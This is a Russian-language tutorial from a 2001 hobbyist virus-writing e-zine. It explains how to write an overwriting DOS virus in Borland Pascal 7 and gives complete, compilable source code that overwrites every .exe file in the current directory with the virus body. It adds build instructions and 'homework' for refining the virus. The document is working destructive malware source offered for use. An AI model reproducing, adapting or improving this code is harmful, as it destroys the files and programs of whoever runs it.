                            (моя первая е-зина) BKNY0NNX // SBVC (c) 27.10.2001
-------------------------------------------------------------------------------

	Написание оверврайтного вируса на Borland Pascal 7.00

 Итак ... Вы решили написать вирус, но чтобы он был по-проще и по-опаснее.
Я думаю, что эту статью вы оцените ;)

 Вирус можно написать на любом языке, но я выбрал BP7, из-за его простоты и
обильного количества программ на нём.

 Алгоритм нашего примитивнейшего вируса очень прост:

               ╔═══════════════════╗
               ║ Открыть свой файл,║
               ║считать тело вируса║
               ║  и закрыть файл   ║
               ╚════════╤══════════╝
                        
                   ╔════╧═══════╗
                   ║Найти первую║
                   ║  жертву    ║
                   ╚════╤═══════╝
                        
                   ╔════╧═════╗
                   ║Не нашлась║
                   ║    -     ║─────────┐
                   ║  выход   ║          │
                   ╚════╤═════╝          │
                                        │
               ╔════════╧═══════════╗    │
               ║Открыть файл жертвы,║    │
               ║записать вирус и    ║    │
               ║   закрыть файл     ║    │
               ╚════════╤═══════════╝    │
                                        │
                 ╔══════╧════════╗       │
                 ║Найти следующую╟───────┘
                 ║    жертву     ║
                 ╚═══════════════╝

 Суть его в том, что он своим телом перезаписывает тела своих жертв
(перезаписывающийся AKA overwriter AKA оверврайтер)

 Вот и его исходник:

=====[CUT HERE]=====
(* Название программы *)
Program Trivial_1;

(* Мы будем использовать дополнительный модуль, предоставляющий сервисы для
   работы с DOS *)
Uses Dos;

Const
	BodySize = 2608;	(* длина вируса *)

Var
	F	: File;		(* файловая переменная для работу с файлами *)
	DirInfo	: SearchRec;	(* переменная для поиска файлов *)
	Body	: Array [1..BodySize] of Byte; (* хранилище тела вируса *)

BEGIN

	Assign(F, ParamStr(0));	(* Подготовка к открытию себя: в ParamStr(0) -
				наше имя *)
	Reset(F, 1);		(* Открываем ... *)
	BlockRead(F, Body, BodySize); (* Считываем своё тело *)
	Close(F);		(* Закрываем себя *)

	FindFirst('*.exe', AnyFile, DirInfo); (* Ищем первую жертву *)

	While DosError = 0 Do Begin	(* Если нашлась ... *)

		Assign(F, DirInfo.Name);	(* Подготовка к открытию жервы:
						 в DirInfo.Name - имя жертвы *)
		ReWrite(F, 1);	(* Перезаписываем *)
		BlockWrite(F, Body, BodySize);	(* Записываем своё тело *)
		Close(F);			(* Закрываем *)

		FindNext(DirInfo);	(* Ищем следующую жертву *)
		End;

END.
=====[END CUT]======

Строки между =====[END HERE]===== и =====[END CUT]====== нужно вырезать,
записать в файл, и этот файл скомпилировать с помощью Borland (Turbo) Pascal 7.0
Если длина получившегося вируса отличается от BodySize, то BodySize надо
изменить на длину получившегося вируса и перекомпилировать вирус.

Задание на дом: ;)
  1. Понять код вируса;
  2. Изменить код так, чтобы если длина жертвы больше длины вируса, длина жертвы
     не изменялась.

			Желаю успеха!
